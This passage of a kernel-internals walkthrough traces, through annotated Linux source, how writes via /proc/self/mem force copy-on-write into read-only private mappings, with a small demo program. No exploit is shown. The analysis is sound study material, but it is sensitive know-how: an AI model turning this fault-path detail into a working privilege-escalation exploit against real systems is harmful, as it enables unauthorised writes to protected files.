bytes = PAGE_SIZE-offset;
//此时的page为get_user_pages_remote()为用户寻找的,是被锁定在内存中的页,kmap将其映射在内核地址空间中
maddr = kmap(page);
if (write) { //写入请求
/*
先调用copy_to_user_page()进行写入
maddr为根据addr锁定的页,offset为addr额页内偏移,两者相加就是要写入的地址
等价为:memcpy(maddr + offset, buf, bytes)
*/
copy_to_user_page(vma, page, addr,
maddr + offset, buf, bytes);
//标记为脏页
set_page_dirty_lock(page);
} else {
//等价:memcpy(buf, maddr+offset, bytes)
copy_from_user_page(vma, page, addr,
buf, maddr + offset, bytes);
}
kunmap(page);
put_page(page);//释放
}
len -= bytes;
buf += bytes;
addr += bytes;
}
up_read(&mm->mmap_sem);

return buf - old_buf;
}

The heart of this function is how it pins the other process's pages in memory, so get_user_pages_remote() is the core of __access_remote_vm().

get_user_pages_remote()

/*
* get_user_pages_remote() - pin user pages in memory
* @tsk: the task_struct to use for page fault accounting, or
* NULL if faults are not to be recorded.
* @mm: mm_struct of target mm
* @start: starting user address
* @nr_pages: number of pages from start to pin
* @write: whether pages will be written to by the caller
* @force: whether to force access even when user mapping is currently
* protected (but never forces write access to shared mapping).
* @pages: array that receives pointers to the pages pinned.
* Should be at least nr_pages long. Or NULL, if caller
* only intends to ensure the pages are faulted in.
* @vmas: array of pointers to vmas corresponding to each page.
* Or NULL if the caller does not require them.
*
* Returns number of pages pinned. This may be fewer than the number
* requested. If nr_pages is 0 or negative, returns 0. If no pages
* were pinned, returns -errno. Each page returned must be released
* with a put_page() call when it is finished with. vmas will only
* remain valid while mmap_sem is held.
*
* Must be called with mmap_sem held for read or write.
*
* get_user_pages walks a process's page tables and takes a reference to
* each struct page that each user address corresponds to at a given
* instant. That is, it takes the page that would be accessed if a user
* thread accesses the given user virtual address at that instant.
*
* This does not guarantee that the page exists in the user mappings when
* get_user_pages returns, and there may even be a completely different
* page there in some cases (eg. if mmapped pagecache has been invalidated
* and subsequently re faulted). However it does guarantee that the page
* won't be freed completely. And mostly callers simply care that the page
* contains data that was valid *at some point in time*. Typically, an IO
* or similar operation cannot guarantee anything stronger anyway because
* locks can't be held over the syscall boundary.
*
* If write=0, the page must not be written to. If the page is written to,
* set_page_dirty (or set_page_dirty_lock, as appropriate) must be called
* after the page is finished with, and before put_page is called.
*
* get_user_pages is typically used for fewer-copy IO operations, to get a
* handle on the memory by some means other than accesses via the user virtual
* addresses. The pages may be submitted for DMA to devices or accessed via
* their kernel linear mapping (via the kmap APIs). Care should be taken to
* use the correct cache flushing APIs.
*
* See also get_user_pages_fast, for performance critical applications.
*
* get_user_pages should be phased out in favor of
* get_user_pages_locked|unlocked or get_user_pages_fast. Nothing
* should use get_user_pages because it cannot pass
* FAULT_FLAG_ALLOW_RETRY to handle_mm_fault.
*/
/*
get_user_pages_remote()-把用户页面锁定在内存中
@tsk:用于进行缺页异常计数的任务描述符,如果是NULL的话就不进行记数
@mm:目标虚拟内存空间
@start:起始用户地址
@nr_pages:从start开始要锁定多少页面
@write:这些要锁定的页面是否需要被写入
@force:当用户映射正在被保护时,用于存放指向被锁定的pages的指针
@vms:一个VMA指针数组,用于存放每一个页面对应的VMA对象

返回被锁定的页面数量,有可能比请求的少,如果是0或者负数,就表示出错了
pages中返回的每一个页面都必须通过put_page()进行释放
vmas中的指针会一直有效,直到mmap_sem被释放
*/
long get_user_pages_remote(struct task_struct *tsk, struct mm_struct *mm,
unsigned long start, unsigned long nr_pages,
int write, int force, struct page **pages,
struct vm_area_struct **vmas)
{
return __get_user_pages_locked(tsk, mm, start, nr_pages, write, force,
pages, vmas, NULL, false,
FOLL_TOUCH | FOLL_REMOTE);
}

get_user_pages_remote() is a wrapper around __get_user_pages_locked().

__get_user_pages_locked()

static __always_inline long __get_user_pages_locked(struct task_struct *tsk,//进行缺页计数的
struct mm_struct *mm, //目标虚拟内存地址
unsigned long start, //起始地址
unsigned long nr_pages, //锁定多少页
int write, //是否需要写入
int force, //是否强制锁定
struct page **pages, //锁定页面的指针数组
struct vm_area_struct **vmas, //被锁定页面对应的VMA数组指针
int *locked, //是否使用VM_FAULT_RETRY的功能,设为NULL
bool notify_drop, //不进行通知,设为false
unsigned int flags) //标志
{
long ret, pages_done;
bool lock_dropped;

if (locked) {
/* if VM_FAULT_RETRY can be returned, vmas become invalid */
BUG_ON(vmas);
/* check caller initialized locked */
BUG_ON(*locked != 1);
}

if (pages)//如果需要获取页面,设置FILL_GET标志
flags |= FOLL_GET;
if (write)//如果需要写入,设置FOLL_WRITE标志
flags |= FOLL_WRITE;
if (force)//是否强制锁定
flags |= FOLL_FORCE;

pages_done = 0;
lock_dropped = false;
for (;;) {
ret = __get_user_pages(tsk, mm, start, nr_pages, flags, pages,
vmas, locked);
if (!locked)//如果VM_FAULT_RETRY无法触发,就直接返回
/* VM_FAULT_RETRY couldn't trigger, bypass */
return ret;

/* VM_FAULT_RETRY cannot return errors */
if (!*locked) {
BUG_ON(ret < 0);
BUG_ON(ret >= nr_pages);
}

if (!pages)
/* If it's a prefault don't insist harder */
return ret;

if (ret > 0) {
nr_pages -= ret;
pages_done += ret;
if (!nr_pages)
break;
}
if (*locked) {
/* VM_FAULT_RETRY didn't trigger */
if (!pages_done)
pages_done = ret;
break;
}
/* VM_FAULT_RETRY triggered, so seek to the faulting offset */
pages += ret;
start += ret << PAGE_SHIFT;

/*
* Repeat on the address that fired VM_FAULT_RETRY
* without FAULT_FLAG_ALLOW_RETRY but with
* FAULT_FLAG_TRIED.
*/
*locked = 1;
lock_dropped = true;
down_read(&mm->mmap_sem);
ret = __get_user_pages(tsk, mm, start, 1, flags | FOLL_TRIED,
pages, NULL, NULL);
if (ret != 1) {
BUG_ON(ret > 1);
if (!pages_done)
pages_done = ret;
break;
}
nr_pages--;
pages_done++;
if (!nr_pages)
break;
pages++;
start += PAGE_SIZE;
}
if (notify_drop && lock_dropped && *locked) {
/*
* We must let the caller know we temporarily dropped the lock
* and so the critical section protected by it was lost.
*/
up_read(&mm->mmap_sem);
*locked = 0;
}
return pages_done;
}

This in turn calls __get_user_pages().

__get_user_pages()

/**
* __get_user_pages() - pin user pages in memory
* @tsk: task_struct of target task
* @mm: mm_struct of target mm
* @start: starting user address
* @nr_pages: number of pages from start to pin
* @gup_flags: flags modifying pin behaviour
* @pages: array that receives pointers to the pages pinned.
* Should be at least nr_pages long. Or NULL, if caller
* only intends to ensure the pages are faulted in.
* @vmas: array of pointers to vmas corresponding to each page.
* Or NULL if the caller does not require them.
* @nonblocking: whether waiting for disk IO or mmap_sem contention
*
* Returns number of pages pinned. This may be fewer than the number
* requested. If nr_pages is 0 or negative, returns 0. If no pages
* were pinned, returns -errno. Each page returned must be released
* with a put_page() call when it is finished with. vmas will only
* remain valid while mmap_sem is held.
*
* Must be called with mmap_sem held. It may be released. See below.
*
* __get_user_pages walks a process's page tables and takes a reference to
* each struct page that each user address corresponds to at a given
* instant. That is, it takes the page that would be accessed if a user
* thread accesses the given user virtual address at that instant.
*
* This does not guarantee that the page exists in the user mappings when
* __get_user_pages returns, and there may even be a completely different
* page there in some cases (eg. if mmapped pagecache has been invalidated
* and subsequently re faulted). However it does guarantee that the page
* won't be freed completely. And mostly callers simply care that the page
* contains data that was valid *at some point in time*. Typically, an IO
* or similar operation cannot guarantee anything stronger anyway because
* locks can't be held over the syscall boundary.
*
* If @gup_flags & FOLL_WRITE == 0, the page must not be written to. If
* the page is written to, set_page_dirty (or set_page_dirty_lock, as
* appropriate) must be called after the page is finished with, and
* before put_page is called.
*
* If @nonblocking != NULL, __get_user_pages will not wait for disk IO
* or mmap_sem contention, and if waiting is needed to pin all pages,
* *@nonblocking will be set to 0. Further, if @gup_flags does not
* include FOLL_NOWAIT, the mmap_sem will be released via up_read() in
* this case.
*
* A caller using such a combination of @nonblocking and @gup_flags
* must therefore hold the mmap_sem for reading only, and recognize
* when it's been released. Otherwise, it must be held for either
* reading or writing and will not be released.
*
* In most cases, get_user_pages or get_user_pages_fast should be used
* instead of __get_user_pages. __get_user_pages should be used only if
* you need some special @gup_flags.
*/
/*
__get_user_pages()-把用户页面固定在内存中
@tsk:目标进程
@mm:目标内存空间
@start:起始用户地址
@nr_pages:锁定多少页面
@gup_flags:控制get user pages的行为标志
@pages:接受被锁定页面指针的指针数组,最少要能保存nr_pages个指针
@vmas:一个VMA指针数组,用于存放每一个页面对应的VMA对象
@nonblocking:是否等待磁盘IO或者mmap_sem竞争
*/
long __get_user_pages(struct task_struct *tsk, struct mm_struct *mm,
unsigned long start, unsigned long nr_pages,
unsigned int gup_flags, struct page **pages,
struct vm_area_struct **vmas, int *nonblocking)
{
long i = 0;
unsigned int page_mask;//根据页面大小设置掩码
struct vm_area_struct *vma = NULL;

if (!nr_pages)
return 0;
/*
——!!pages:等价于pages!=0,表示pages是否为一个非空指针
——!!(gup_flags & FOLL_GET):等价于gup_flags & FOLL_GET!=0,标志是否设置FOLL_GET标志
——只要这两个条件不像等就会出bug
要么pages是个空指针,gup_flags没设置FOLL_GET标志,不需要获取页面
要么pages存在,gup_flags设置了FOLL_GET标志,需要获取页面*/
VM_BUG_ON(!!pages != !!(gup_flags & FOLL_GET));

/*
* If FOLL_FORCE is set then do not force a full fault as the hinting
* fault information is unrelated to the reference behaviour of a task
* using the address space
*/
if (!(gup_flags & FOLL_FORCE))
gup_flags |= FOLL_NUMA;

//通过一个do{...}while(nr_pages)循环, 遍历所有需要锁定的页, 处理一个页之前, 先找到所属的VMA
do {
struct page *page;
unsigned int foll_flags = gup_flags;
unsigned int page_increm;

//如果是第一次迭代,或者跨越了VMA的边界
/* first iteration or cross vma bound */
if (!vma || start >= vma->vm_end) {
vma = find_extend_vma(mm, start);//寻找包含start的VMA对象
if (!vma && in_gate_area(mm, start)) {//寻找出错
int ret;
ret = get_gate_page(mm, start & PAGE_MASK,
gup_flags, &vma,
pages ? &pages[i] : NULL);
if (ret)
return i ? : ret;
page_mask = 0;
goto next_page;
}
//短路测试:如果vma不为NULL,那就会执行check_vma_flags(vma, gup_flags)检查下vma的权限是满足gup_flags的要求
if (!vma || check_vma_flags(vma, gup_flags))
return i ? : -EFAULT;
if (is_vm_hugetlb_page(vma)) {//对于大TLB的页面,调用follow_hugetlb_page()处理
i = follow_hugetlb_page(mm, vma, pages, vmas,
&start, &nr_pages, i,
gup_flags);
continue;
}
}
retry:
/*
* If we have a pending SIGKILL, don't keep faulting pages and
* potentially allocating memory.
*/
/*__get_user_pages()最核心的部分, 就是下面这个循环, follow_page_mask()判断对应页是否满足foll_flags要求, faultin_page()负责处理错误, 会一直循环到对应页满足foll_flags的要求*/
//如果有待处理的SIGKILL,就直接结束
if (unlikely(fatal_signal_pending(current)))
return i ? i : -ERESTARTSYS;
cond_resched();//调度执行别的任务
//根据foll_flags的要求追踪vma中start对应的页,如果不能满足要求或者页不存在,就返回NULL
page = follow_page_mask(vma, start, foll_flags, &page_mask);
if (!page) {//缺页异常处理
int ret;
//faultin_page()会处理缺页异常,处理完毕后会返回0
ret = faultin_page(tsk, vma, start, &foll_flags,
nonblocking);
switch (ret) {
case 0:
goto retry;//缺页异常处理完毕,再次尝试追踪页,看有无缺页异常发生
case -EFAULT://处理缺页异常时发送,处理终止
case -ENOMEM:
case -EHWPOISON:
return i ? i : ret;
case -EBUSY:
return i;
case -ENOENT://异常处理完毕,只是没有对应的页描述符,处理下一页
goto next_page;
}
BUG();
} else if (PTR_ERR(page) == -EEXIST) {
/*
* Proper page table entry exists, but no corresponding
* struct page.
*/
goto next_page;
} else if (IS_ERR(page)) {
return i ? i : PTR_ERR(page);
}
//处理完这个页之后, 记录结果, 然后处理下一个页
if (pages) {//记录锁定的页
pages[i] = page;
flush_anon_page(vma, page, start);
flush_dcache_page(page);
page_mask = 0;
}
next_page:
if (vmas) {//记录页对应的vma
vmas[i] = vma;
page_mask = 0;
}
page_increm = 1 + (~(start >> PAGE_SHIFT) & page_mask);
if (page_increm > nr_pages)
page_increm = nr_pages;
i += page_increm;//处理了多少页
start += page_increm * PAGE_SIZE;//下一个处理的地址
nr_pages -= page_increm;//还剩多少页
} while (nr_pages);
return i;
}
EXPORT_SYMBOL(__get_user_pages);

follow_page_mask()

/**
* follow_page_mask - look up a page descriptor from a user-virtual address
* @vma: vm_area_struct mapping @address
* @address: virtual address to look up
* @flags: flags modifying lookup behaviour
* @page_mask: on output, *page_mask is set according to the size of the page
*
* @flags can have FOLL_ flags set, defined in <linux/mm.h>
*
* Returns the mapped (struct page *), %NULL if no mapping exists, or
* an error pointer if there is a mapping to something not represented
* by a page descriptor (see also vm_normal_page()).
*/
/*
follow_page_mask -根据一个用户空间地址找一个页描述符
@vma:映射@address的VMA对象
@flags:控制查找行为的描述符
@page_mask:*page_mask根据页面大小设置

返回被映射的页,如果页不存在或者出错的话就返回NULL
*/
struct page *follow_page_mask(struct vm_area_struct *vma,
unsigned long address, unsigned int flags,
unsigned int *page_mask)
{
pgd_t *pgd;//全局页目录
pud_t *pud;//页上级目录
pmd_t *pmd;//页中级目录
spinlock_t *ptl;//自旋锁
struct page *page;
struct mm_struct *mm = vma->vm_mm;//VMA所属的内存空间

*page_mask = 0;//根据页面大小设置的掩码

page = follow_huge_addr(mm, address, flags & FOLL_WRITE);
if (!IS_ERR(page)) {
BUG_ON(flags & FOLL_GET);
return page;
}
/*
跟踪四级页目录:pgd=>pud=>pmd,
如果对应表项为none, 则返回no_page_table()表示出错, 最后进入follow_page_pte()跟踪pte
*/
//在mm中根据address找对应的页全局目录
pgd = pgd_offset(mm, address);
if (pgd_none(*pgd) || unlikely(pgd_bad(*pgd)))
return no_page_table(vma, flags);

//在页全局目录中找对应的页上级目录
pud = pud_offset(pgd, address);
if (pud_none(*pud))
return no_page_table(vma, flags);
if (pud_huge(*pud) && vma->vm_flags & VM_HUGETLB) {
page = follow_huge_pud(mm, address, pud, flags);
if (page)
return page;
return no_page_table(vma, flags);
}
if (unlikely(pud_bad(*pud)))
return no_page_table(vma, flags);
//在页上级目录中找对应的页中级目录
pmd = pmd_offset(pud, address);
if (pmd_none(*pmd))
return no_page_table(vma, flags);
if (pmd_huge(*pmd) && vma->vm_flags & VM_HUGETLB) {
page = follow_huge_pmd(mm, address, pmd, flags);
if (page)
return page;
return no_page_table(vma, flags);
}
if ((flags & FOLL_NUMA) && pmd_protnone(*pmd))
return no_page_table(vma, flags);
if (pmd_devmap(*pmd)) {
ptl = pmd_lock(mm, pmd);
page = follow_devmap_pmd(vma, address, pmd, flags);
spin_unlock(ptl);
if (page)
return page;
}
if (likely(!pmd_trans_huge(*pmd)))//跟踪pte
return follow_page_pte(vma, address, pmd, flags);

ptl = pmd_lock(mm, pmd);
if (unlikely(!pmd_trans_huge(*pmd))) {
spin_unlock(ptl);
return follow_page_pte(vma, address, pmd, flags);
}
if (flags & FOLL_SPLIT) {
int ret;
page = pmd_page(*pmd);
if (is_huge_zero_page(page)) {
spin_unlock(ptl);
ret = 0;
split_huge_pmd(vma, pmd, address);
if (pmd_trans_unstable(pmd))
ret = -EBUSY;
} else {
get_page(page);
spin_unlock(ptl);
lock_page(page);
ret = split_huge_page(page);
unlock_page(page);
put_page(page);
if (pmd_none(*pmd))
return no_page_table(vma, flags);
}

return ret ? ERR_PTR(ret) :
follow_page_pte(vma, address, pmd, flags);
}

page = follow_trans_huge_pmd(vma, address, pmd, flags);
spin_unlock(ptl);
*page_mask = HPAGE_PMD_NR - 1;
return page;
}

follow_page_pte()

For most ordinary pages, follow_page_pte() checks for the two fault conditions (page not present and page not writable), and then calls vm_normal_page() to turn the pte into the corresponding struct page descriptor.

//根据flags标志跟踪页面的pte
static struct page *follow_page_pte(struct vm_area_struct *vma,
unsigned long address, pmd_t *pmd, unsigned int flags)
{
struct mm_struct *mm = vma->vm_mm;
struct dev_pagemap *pgmap = NULL;
struct page *page;
spinlock_t *ptl;
pte_t *ptep, pte;

retry:
if (unlikely(pmd_bad(*pmd)))
return no_page_table(vma, flags);

ptep = pte_offset_map_lock(mm, pmd, address, &ptl);
pte = *ptep;
if (!pte_present(pte)) {
swp_entry_t entry;
/*
* KSM's break_ksm() relies upon recognizing a ksm page
* even while it is being migrated, so for that case we
* need migration_entry_wait().
*/
if (likely(!(flags & FOLL_MIGRATION)))
goto no_page;
if (pte_none(pte))
goto no_page;
entry = pte_to_swp_entry(pte);
if (!is_migration_entry(entry))
goto no_page;
pte_unmap_unlock(ptep, ptl);
migration_entry_wait(mm, pmd, address);
goto retry;
}
if ((flags & FOLL_NUMA) && pte_protnone(pte))
goto no_page;
if ((flags & FOLL_WRITE) && !pte_write(pte)) {//如果要求写入,但是pte表示不可写入
pte_unmap_unlock(ptep, ptl);
return NULL;
}

page = vm_normal_page(vma, address, pte);//根据这个pte找到对应的普通页描述符
/*
找到页描述符后, 会根据flags进行一些操作, 然后返回page, 在这里flags = 0x2017, 也就是如下标志
FOLL_WRITE 0x01 : 需要进行写入
FOLL_TOUCH 0x02 : 标记一下页面被访问过
FOLL_GET 0x04 : 获取页面的引用, 从而让页面锁定在内存中
FOLL_FORCE 0x10 : 强制写入只读内存区
FOLL_REMOTE 0x2000 : 要访问的不是当前任务的内存空间
*/
if (!page && pte_devmap(pte) && (flags & FOLL_GET)) {
/*
* Only return device mapping pages in the FOLL_GET case since
* they are only valid while holding the pgmap reference.
*/
pgmap = get_dev_pagemap(pte_pfn(pte), NULL);
if (pgmap)
page = pte_page(pte);
else
goto no_page;
} else if (unlikely(!page)) {
if (flags & FOLL_DUMP) {
/* Avoid special (like zero) pages in core dumps */
page = ERR_PTR(-EFAULT);
goto out;
}

if (is_zero_pfn(pte_pfn(pte))) {
page = pte_page(pte);
} else {
int ret;

ret = follow_pfn_pte(vma, address, ptep, flags);
page = ERR_PTR(ret);
goto out;
}
}

if (flags & FOLL_SPLIT && PageTransCompound(page)) {
int ret;
get_page(page);
pte_unmap_unlock(ptep, ptl);
lock_page(page);
ret = split_huge_page(page);
unlock_page(page);
put_page(page);
if (ret)
return ERR_PTR(ret);
goto retry;
}

if (flags & FOLL_GET) {//如果设置了GET标志,则会获取一个页面的引用,防止页面从内存中被换出
get_page(page);

/* drop the pgmap reference now that we hold the page */
if (pgmap) {
put_dev_pagemap(pgmap);
pgmap = NULL;
}
}
if (flags & FOLL_TOUCH) {//标记下这个页被访问过
//如果要写入,但是页面也在不是脏的话,就设置为脏页
if ((flags & FOLL_WRITE) &&
!pte_dirty(pte) && !PageDirty(page))
set_page_dirty(page);
/*
* pte_mkyoung() would be more correct here, but atomic care
* is needed to avoid losing the dirty bit: it is easier to use
* mark_page_accessed().
*/
//标记
mark_page_accessed(page);
}
if ((flags & FOLL_MLOCK) && (vma->vm_flags & VM_LOCKED)) {
/* Do not mlock pte-mapped THP */
if (PageTransCompound(page))
goto out;

/*
* The preliminary mapping check is mainly to avoid the
* pointless overhead of lock_page on the ZERO_PAGE
* which might bounce very badly if there is contention.
*
* If the page is already locked, we don't need to
* handle it now - vmscan will handle it later if and
* when it attempts to reclaim the page.
*/
if (page->mapping && trylock_page(page)) {
lru_add_drain(); /* push cached pages to LRU */
/*
* Because we lock page here, and migration is
* blocked by the pte's page reference, and we
* know the page is still mapped, we don't even
* need to check for file-cache page truncation.
*/
mlock_vma_page(page);
unlock_page(page);
}
}
out:
pte_unmap_unlock(ptep, ptl);
return page;
no_page:
pte_unmap_unlock(ptep, ptl);
if (!pte_none(pte))
return NULL;
return no_page_table(vma, flags);
}

faultin_page()

faultin_page() converts the FOLL_* flags in flags into the FAULT_* flags used by handle_mm_fault(), and then calls handle_mm_fault() to handle the fault.

/*
* mmap_sem must be held on entry. If @nonblocking != NULL and
* *@flags does not include FOLL_NOWAIT, the mmap_sem may be released.
* If it is, *@nonblocking will be set to 0 and -EBUSY returned.
*/
static int faultin_page(struct task_struct *tsk, struct vm_area_struct *vma,
unsigned long address, unsigned int *flags, int *nonblocking)
{
unsigned int fault_flags = 0;
int ret;

/* mlock all present pages, but do not fault in new pages */
if ((*flags & (FOLL_POPULATE | FOLL_MLOCK)) == FOLL_MLOCK)
return -ENOENT;
/* For mm_populate(), just skip the stack guard page. */
if ((*flags & FOLL_POPULATE) &&
(stack_guard_page_start(vma, address) ||
stack_guard_page_end(vma, address + PAGE_SIZE)))
return -ENOENT;

//根据FOLL_标着设置FAULT_FLAG标志
if (*flags & FOLL_WRITE)
fault_flags |= FAULT_FLAG_WRITE;
if (*flags & FOLL_REMOTE)
fault_flags |= FAULT_FLAG_REMOTE;
if (nonblocking)
fault_flags |= FAULT_FLAG_ALLOW_RETRY;
if (*flags & FOLL_NOWAIT)
fault_flags |= FAULT_FLAG_ALLOW_RETRY | FAULT_FLAG_RETRY_NOWAIT;
if (*flags & FOLL_TRIED) {
VM_WARN_ON_ONCE(fault_flags & FAULT_FLAG_ALLOW_RETRY);
fault_flags |= FAULT_FLAG_TRIED;
}
//处理缺页异常
ret = handle_mm_fault(vma, address, fault_flags);
if (ret & VM_FAULT_ERROR) {
if (ret & VM_FAULT_OOM)
return -ENOMEM;
if (ret & (VM_FAULT_HWPOISON | VM_FAULT_HWPOISON_LARGE))
return *flags & FOLL_HWPOISON ? -EHWPOISON : -EFAULT;
if (ret & (VM_FAULT_SIGBUS | VM_FAULT_SIGSEGV))
return -EFAULT;
BUG();
}

if (tsk) {
if (ret & VM_FAULT_MAJOR)
tsk->maj_flt++;
else
tsk->min_flt++;
}

if (ret & VM_FAULT_RETRY) {
if (nonblocking)
*nonblocking = 0;
return -EBUSY;
}

/*
* The VM_FAULT_WRITE bit tells us that do_wp_page has broken COW when
* necessary, even if maybe_mkwrite decided not to set pte_write. We
* can thus safely do subsequent page lookups as if they were reads.
* But only do so when looping for pte_write is futile: in some cases
* userspace may also be wanting to write to the gotten user page,
* which a read fault here might prevent (a readonly page might get
* reCOWed by userspace write).
*/
if ((ret & VM_FAULT_WRITE) && !(vma->vm_flags & VM_WRITE))
*flags &= ~FOLL_WRITE;
return 0;
}

The rough flow

mem_write()
mem_rw()
__access_remote_vm()
get_user_pages_remote()
__get_user_pages_locked()
__get_user_pages()
follow_page_mask()
follow_page_pte()
faultin_page()

The curious journey of __get_user_pages 🤔

Test demo

#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <fcntl.h>
#include <unistd.h>
#include <sys/mman.h>
#include <sys/stat.h>

int fd;
struct stat st;
void *mem;

void processMem(void)
{
    /* write to the read-only private mapping through /proc/self/mem */
    int f = open("/proc/self/mem", O_RDWR);
    lseek(f, (off_t)(uintptr_t)mem, SEEK_SET);
    write(f, "AAA", 3);
}

int main(void)
{
    fd = open("./test", O_RDONLY);
    fstat(fd, &st);
    mem = mmap(NULL, st.st_size, PROT_READ, MAP_PRIVATE, fd, 0);

    processMem();
    return 0;
}

__get_user_pages: the first iteration

Because of the Linux kernel's demand paging, no physical page is allocated for a page before it is first accessed, so there is no page-table entry to find: the first call to follow_page_mask() naturally returns NULL. faultin_page() is then called and we enter handle_mm_fault() to start page-fault handling.

__handle_mm_fault() allocates the page-table entries at each level and then calls handle_pte_fault().

handle_pte_fault() sees a file-backed mapping whose PTE is entirely none, and calls do_fault() to handle it.

if (!fe->pte) {//如果 fe->pte 为空,则说明页面不存在,根据 VMA(Virtual Memory Area)是否匿名执行不同的页面处理操作。
if (vma_is_anonymous(fe->vma))
return do_anonymous_page(fe);
else
return do_fault(fe);//分配物理页框
}

do_fault() sees that this is a write into a privately mapped file region and calls do_cow_fault() to perform copy-on-write.

if (!(vma->vm_flags & VM_SHARED))//如果虚拟内存区域的标志中不包含 VM_SHARED 标志,说明该区域是私有的,函数调用 do_cow_fault 函数处理写时复制错误(Copy-On-Write Fault)。
return do_cow_fault(fe, pgoff);
  • First, alloc_page_vma() allocates a new page
  • Then __do_fault() looks up the page descriptor of the original page backing address
  • Then copy_user_highpage() copies the contents of the original page into the new page
  • Both the old and the new page are mapped in the kernel address space, so the copy is a plain memcpy()
  • Finally, alloc_set_pte() fills in the PTE in the page table and sets up the reverse mapping
static int do_cow_fault(struct fault_env *fe, pgoff_t pgoff)
{
struct vm_area_struct *vma = fe->vma;
struct page *fault_page, *new_page;
void *fault_entry;
struct mem_cgroup *memcg;
int ret;

if (unlikely(anon_vma_prepare(vma)))
return VM_FAULT_OOM;

new_page = alloc_page_vma(GFP_HIGHUSER_MOVABLE, vma, fe->address);//为当前进程分配一个新的页面
if (!new_page)
return VM_FAULT_OOM;

if (mem_cgroup_try_charge(new_page, vma->vm_mm, GFP_KERNEL,//为新页面分配内存资源
&memcg, false)) {
put_page(new_page);
return VM_FAULT_OOM;
}

ret = __do_fault(fe, pgoff, new_page, &fault_page, &fault_entry);//读取文件内容到fault_page
if (unlikely(ret & (VM_FAULT_ERROR | VM_FAULT_NOPAGE | VM_FAULT_RETRY)))
goto uncharge_out;

if (!(ret & VM_FAULT_DAX_LOCKED))
copy_user_highpage(new_page, fault_page, fe->address, vma);//拷贝fault_page内容到new_page
__SetPageUptodate(new_page);

ret |= alloc_set_pte(fe, memcg, new_page);//设置pte,置换该进程中的pte表项,对于写操作会将该页标脏(该函数会调用maybe_mkwrite()函数,其会调用pte_mkdirty()函数标脏该页)
if (fe->pte)
pte_unmap_unlock(fe->pte, fe->ptl);
if (!(ret & VM_FAULT_DAX_LOCKED)) {//释放fault_page
unlock_page(fault_page);
put_page(fault_page);
} else {
dax_unlock_mapping_entry(vma->vm_file->f_mapping, pgoff);
}
if (unlikely(ret & (VM_FAULT_ERROR | VM_FAULT_NOPAGE | VM_FAULT_RETRY)))
goto uncharge_out;
return ret;
uncharge_out:
mem_cgroup_cancel_charge(new_page, memcg, false);
put_page(new_page);
return ret;
}

The flow of alloc_set_pte() is as follows. In this test program, the VMA being COW'd is not writable, so the resulting COW page only gets the dirty bit and not the writable bit.

Note set_pte_at() here: it writes the pte describing this physical page into the page table of the vma->vm_mm address space, i.e. it makes that user process's virtual memory map onto this physical page.

int alloc_set_pte(struct fault_env *fe, struct mem_cgroup *memcg,
struct page *page)
{
struct vm_area_struct *vma = fe->vma;
bool write = fe->flags & FAULT_FLAG_WRITE;
pte_t entry;
int ret;

if (pmd_none(*fe->pmd) && PageTransCompound(page) &&
IS_ENABLED(CONFIG_TRANSPARENT_HUGE_PAGECACHE)) {
/* THP on COW? */
VM_BUG_ON_PAGE(memcg, page);

ret = do_set_pmd(fe, page);
if (ret != VM_FAULT_FALLBACK)
return ret;
}

if (!fe->pte) {
ret = pte_alloc_one_map(fe);
if (ret)
return ret;
}

/* Re-check under ptl */
if (unlikely(!pte_none(*fe->pte)))
return VM_FAULT_NOPAGE;

flush_icache_page(vma, page);
entry = mk_pte(page, vma->vm_page_prot); //根据页物理地址与VMA权限生成PTE
if (write) //pte_mkdirty会给PTE加上脏位
entry = maybe_mkwrite(pte_mkdirty(entry), vma); //如果这片VMA可写,那么maybe_mkwrite()会给PTE加上可写位
/* copy-on-write page */
//建立反向映射:从page对象触发,找到映射到此的VMA
if (write && !(vma->vm_flags & VM_SHARED)) {
inc_mm_counter_fast(vma->vm_mm, MM_ANONPAGES);
page_add_new_anon_rmap(page, vma, fe->address, false);
mem_cgroup_commit_charge(page, memcg, false, false);
lru_cache_add_active_or_unevictable(page, vma);
} else {
inc_mm_counter_fast(vma->vm_mm, mm_counter_file(page));
page_add_file_rmap(page, false);
}
//在页表中设置PTE
set_pte_at(vma->vm_mm, fe->address, fe->pte, entry);

/* no need to invalidate: a not-present page won't be cached */
//更新MMU缓存
update_mmu_cache(vma, fe->address, fe->pte);

return 0;
}

The call chain is as follows

faultin_page()
handle_mm_fault()
__handle_mm_fault()
handle_pte_fault()
do_fault()
do_cow_fault()
alloc_set_pte()
maybe_mkwrite()
pte_mkdirty()

__get_user_pages: the second iteration

After the COW page has been allocated, execution goes back to the retry label and enters follow_page_mask() a second time; this time everything is in place and we reach follow_page_pte().

But because the PTE is still not writable and FOLL_WRITE is set in flags, the lookup fails again: follow_page_mask() returns NULL and faultin_page() is entered once more to handle the fault.

if ((flags & FOLL_WRITE) && !pte_write(pte)) {//如果要求写入,但是pte表示不可写入
pte_unmap_unlock(ptep, ptl);
return NULL;
}

Since a write is requested and the page now exists, handle_pte_fault() calls do_wp_page() to do the copy-on-write.

if (fe->flags & FAULT_FLAG_WRITE) {//存在 FAULT_FLAG_WRITE 标志位,表示缺页异常由写操作引起
if (!pte_write(entry))//对应的页不可写
return do_wp_page(fe, entry);//进行写时复制,将内容写入由 do_fault()->do_cow_fault()分配的内存页中

The flow of do_wp_page():

    • Call vm_normal_page() to find the page descriptor corresponding to address
    • If it turns out to be an anonymous page with only a single reference, wp_page_reuse() is called to reuse the page directly
    • The first faultin_page() already went through do_cow_fault() and copied a dedicated page, so execution goes straight into wp_page_reuse() and reuses that page
//能否重用一个页
if (reuse_swap_page(old_page, &total_mapcount)) {
//如果这个匿名页只有一个映射,那么不用重新分配页,直接把旧页拿去写
if (total_mapcount == 1) {
/*
* The page is all ours. Move it to
* our anon_vma so the rmap code will
* not search our parent or siblings.
* Protected against the rmap code by
* the page lock.
*/
//把旧业放到anon_vma中,这个涉及到反向映射
page_move_anon_rmap(old_page, vma);
}
unlock_page(old_page);
//旧页只属于这个进程,尝试给PTE加上可写入标志
return wp_page_reuse(fe, orig_pte, old_page, 0, 0);
}

wp_page_reuse() mainly sets up the PTE and then returns VM_FAULT_WRITE.

    • Note that because this VMA is not writable, the PTE still does not get the RW bit.
static inline int wp_page_reuse(struct fault_env *fe, pte_t orig_pte,
struct page *page, int page_mkwrite, int dirty_shared)
__releases(fe->ptl)
{
struct vm_area_struct *vma = fe->vma;
pte_t entry;
/*
* Clear the pages cpupid information as the existing
* information potentially belongs to a now completely
* unrelated process.
*/
if (page)
page_cpupid_xchg_last(page, (1 << LAST_CPUPID_SHIFT) - 1);

